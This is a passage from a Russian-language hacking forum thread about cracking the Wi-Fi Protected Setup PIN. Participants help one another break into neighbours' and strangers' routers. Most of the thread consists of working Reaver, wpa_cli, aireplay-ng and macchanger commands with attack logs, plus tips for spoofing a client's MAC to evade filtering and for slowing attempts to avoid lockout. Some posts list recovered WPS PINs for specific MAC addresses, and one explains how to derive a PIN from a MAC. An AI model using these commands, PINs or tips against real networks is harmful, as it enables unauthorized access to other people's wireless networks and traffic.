Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. Westbam

    Westbam Member

    Joined:
    5 Oct 2012
    Messages:
    44
    Likes Received:
    19
    Reputations:
    0
    Rockstar7
    На скрине только одна галка видна.."Disable WPS-PIN Method"
    Пин на котором прога зацикливается он совпадает с тем что указано в настройках роутера?
     
  2. Eddi

    Eddi Member

    Joined:
    2 Aug 2012
    Messages:
    164
    Likes Received:
    11
    Reputations:
    0
    Из головы не выходит один вопрос, точнее 2, сам ответ найти не смог может, кто здесь подскажет или в какую сторону копать даст совет.
    Итак:

    1. "Раздолбил" благодаря неотключенному WPS некоторое количество точек доступа, к сожалению, большинство из них дали только пин-код. И все же от чего зависит: даст ли очередная БС пин и ключ или только пин, от версияи реализации ВПС или это всего навсего значит, что владелец данной БС, вообще, ключ не настраивал, а подключается исключительно по ВПС?

    У какого какие мысли?

    2. Подключаюсь к базе по пину (wpa_supplicant -Dwext -iwlan1 -C/var/run/wpa_supplicant -B
    wpa_cli wps_reg <BSSID> <PIN> - спасибо запостившему) в wpa_gui жму вкладку "edit" и там, о чудо, в прежде пустой строке "PSK" уже есть прописанная строка с ключом, которая, к сожалению, пока в виде "кружечков". Есть ли какая-либо возможность получить из нее ключ в читаемом виде?

    Ну и раз пошла такая пьянка еще вопросик вдогонку. Подключаясь через wpa_gui к некоторым БС, не могу начать в них работу из-за того, что мой dhcp клиент не отсылает в сеть запросы на присвоение мне ip адреса (смотрю в wireshark), как его (dhcp- клиента) привести в чувство или где можно себе прописать ip? Раньше никогда такой проблемы не возникало ибо подключался через wicd, там все просто...
     
    #342 Eddi, 30 Oct 2012
    Last edited: 30 Oct 2012
  3. moaddip

    moaddip Banned

    Joined:
    23 Feb 2012
    Messages:
    276
    Likes Received:
    74
    Reputations:
    1
    от дир615 23180253
    выдал вместе с паролем
     
  4. Diman779

    Diman779 New Member

    Joined:
    12 Oct 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    скажи пожалуйста , где можно найти пин коды для этих роутеров ????



    20:F3:A3:47: DA:1B -77 31 3 0 1 54e WPA2 TKIP PSK HG530
    20:F3:A3:44:83:74 -85 1 1 0 1 54 WEP WEP HG530
    00:0B:2B:3D:F7:EC -89 28 0 0 3 54 . WPA2 CCMP PSK ACORP
    00:0B:2B:51:C5:B0 -86 22 2 0 11 54 WPA2 CCMP PSK ACORP-7(пїЅ.пїЅ
     
  5. Diman779

    Diman779 New Member

    Joined:
    12 Oct 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    а есть для этих мас ???

    20:F3:A3:47: DA:1B -77 31 3 0 1 54e WPA2 TKIP PSK HG530
    20:F3:A3:44:83:74 -85 1 1 0 1 54 WEP WEP HG530
    00:0B:2B:3D:F7:EC -89 28 0 0 3 54 . WPA2 CCMP PSK ACORP
    00:0B:2B:51:C5:B0 -86 22 2 0 11 54 WPA2 CCMP PSK ACORP-7(пїЅ.пїЅ
     
  6. user_bad

    user_bad Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    94
    Likes Received:
    12
    Reputations:
    1
    zyxel
    CC:5D:4E:4E:AE:AB
    51565220
     
  7. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Всем привет, прочитал весь форум по этой теме и многое чего почерпнул для себя, но есть вопрос: Прошу вашей помощи взломать точку WPA. В Reaver (BT5) стопорится на этом:
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    WPS включен, т.е. точка прсутствует при команде Wash -i mon0 -C -s. Вначале запустил aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one
    и через некоторое время выдало, что соединения нет и показало список возможных причин и на первом месте было указано,что включен фильтр по МАС адресу, остальные-не стоили внимания.Тогда подменил МАС на клиентский и запустил airodump-ng mon0 -c 1, a в другом терминале- aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one и мне показало, что соединение есть, т.е.
    Sending Authentication Request (Open System) [ACK]
    Authentication Successfull
    Sending association Request [ACK]
    Association succesfull:)(AID:1), потом в первом терминале запустил reaver и ступор тот-же. Что посоветуете. Использую Rtl8187L, сигнал хороший.
    При работе в reaver с дефолтным МАС я вижу, что через некоторое время роутер меня отключает, а при подменённым МАС связь держится постоянно, как показывает aireplay. Заранее благодарю.
     
  8. saxa

    saxa New Member

    Joined:
    4 Mar 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0

    hex=4EAEAB
    dec=5156523
    Делай вывод и так большинство роутеров
     
  9. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Спасибо, но я не знаю что с этим делать, научите п.ж. Буду благодарен.
     
  10. kachinski

    kachinski Elder - Старейшина

    Joined:
    21 Dec 2007
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Кстати с подмененным MAC как я заметил нужно входить только когда на точке нету этого самаого клиента, а то что показывает якобы висит поддельный MAC возможно то вовсе и не ваш, а реального клиента.

    У меня еще хуже ситуация, долбил точку всю ночь, дошел до 99% с копейками, а с утра ее отключили. Airodump-ng тоже не показывает ее наличия, хорошо что reaver сохраняет прогресс.
     
    #350 kachinski, 16 Nov 2012
    Last edited: 16 Nov 2012
  11. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    3,714
    Likes Received:
    12,418
    Reputations:
    351
    Бывает , что точка доступа зависает от слишком частого запроса PIN . Пока не перезагрузят, АР не оклемается.
    Можно попробовать увеличить задержку между попытками: reaver -i mon0 -b 00:01:02:03:04:05 -d 5 -S -v (можно выставит задержку от 5 до 15 сек.).
     
    _________________________
  12. seonan

    seonan New Member

    Joined:
    1 Nov 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    WPS PIN для таких MAC точек доступа:
    54:04:A6:5D:50... 238373##
    F8:D1:11:32:1F... 961446##
    B0:48:7A:F5:7B... 090061##
     
  13. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Привет всем!
    Может поможете чем...
    Есть точка доступа,сигнал от -65 до ~-50db, мак 80:1F:02:06:x:x видимо точка Edimax.
    Мой девайс TL-WN7200ND. Пользуюсь Wifislax 4.3, но также пробовал BT5R2,3. Начал ривером подбирать пин (reaver -i mon0 -b ... -c 9):
    Code:
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
    [+] Waiting for beacon from 80:1F:02:06:x:x
    [+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
    [+] Trying pin 12345670
    [+] Trying pin 00005678
    [+] Trying pin 01235678
    [+] Trying pin 11115670
    [+] Trying pin 11115670
    [+] Trying pin 22225672
    [+] 0.05% complete @ 2012-11-09 22:45:38 (2 seconds/pin)
    
    Через некоторое время стали появляться ошибки, причем по логу видно что где-то через час и до утра:
    Code:
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] 11.87% complete @ 2012-11-09 23:43:35 (2 seconds/pin)
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] 11.87% complete @ 2012-11-09 23:53:48 (3 seconds/pin) 
    ...
    [+] 11.87% complete @ 2012-11-10 09:57:27 (30 seconds/pin)
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [!] WARNING: 10 failed connections in a row
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678 
    И тепер уже вторую неделю вот так (reaver -i mon0 -b ... -c 9 -vv):
    Code:
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
    [+] Switching mon0 to channel 9
    [+] Waiting for beacon from 80:1F:02:06:x:x
    [+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request 
    Wash все это время показывает wps no на этой точке (TTk). Также пробовал другие wifi девайсы, добавлял команды essid, уменьшал время -d...
    С другими точками подбор идет...

    Из за чего может быть эта ошибка-Receive timeout occurred??
    Заранее Спасибо!
     
    #353 pav087, 19 Nov 2012
    Last edited: 19 Nov 2012
  14. Buran

    Buran Elder - Старейшина

    Joined:
    25 Feb 2011
    Messages:
    1,206
    Likes Received:
    6,732
    Reputations:
    110
    Думается варианта тут всего два:
    1) Точку переставили в другое место, или просто уровень сигнала упал. Можно (нужно) проверить.
    2) Включили блокировку по МАС-адресу. Надо сменить МАС на интерфейсе mon0.
     
  15. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Сигнал до точки остался такой-же, даже в некоторых местах доходит до -45db.
    По мак блокировку думаю маловероятно, после этого с других wifi карт пробовал, тоже самое получалось... На точке есть клиент, я пробовал подставлять в ривер мак клиента через команду -m...
    Делал так:
    Code:
    ifconfig wlan0 down
    macchanger -m (мак клиента) wlan0
    ifconfig wlan0 up
    airmon-ng start wlan0 
    reaver -i mon0 -b (мак точка) -c 9 -m (мак клиента) -vv
    handshake ловится практически сразу, но брут не помогает...
     
  16. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,040
    Likes Received:
    500
    Reputations:
    285
    тема для брута http://forum.antichat.ru/thread274700.html
     
  17. Buran

    Buran Elder - Старейшина

    Joined:
    25 Feb 2011
    Messages:
    1,206
    Likes Received:
    6,732
    Reputations:
    110
    Нужно сменить МАС-адрес на интерфейсе. Делаем так:
    Code:
    ifconfig mon0 down
    macchanger -m 00:01:02:aa:bb:cc mon0
    ifconfig mon0 up
    
    Это будет совсем другое дело. Macchanger берём здесь если нету.
     
  18. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Ок, спасибо попробую так. Да и вопрос, а в reaver команду -m надо будет после этого добавлять?
     
    #358 pav087, 19 Nov 2012
    Last edited: 19 Nov 2012
  19. Buran

    Buran Elder - Старейшина

    Joined:
    25 Feb 2011
    Messages:
    1,206
    Likes Received:
    6,732
    Reputations:
    110
    Нет.
     
  20. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    В общем попробовал с маком клиента, та же беда и когда клиент есть, и когда нету, сыпятся ошибки - [!] WARNING: Receive timeout occurred... :( Сигнал до точки ~ -59db. Клиента ~ -56db.

    Может точка заблокировала WPS до перезагрузки?
    Ведь как только начал подбирать, дошло до 11% за час...
    Может есть какие-нибудь еще идеи? :confused:
     
Loading...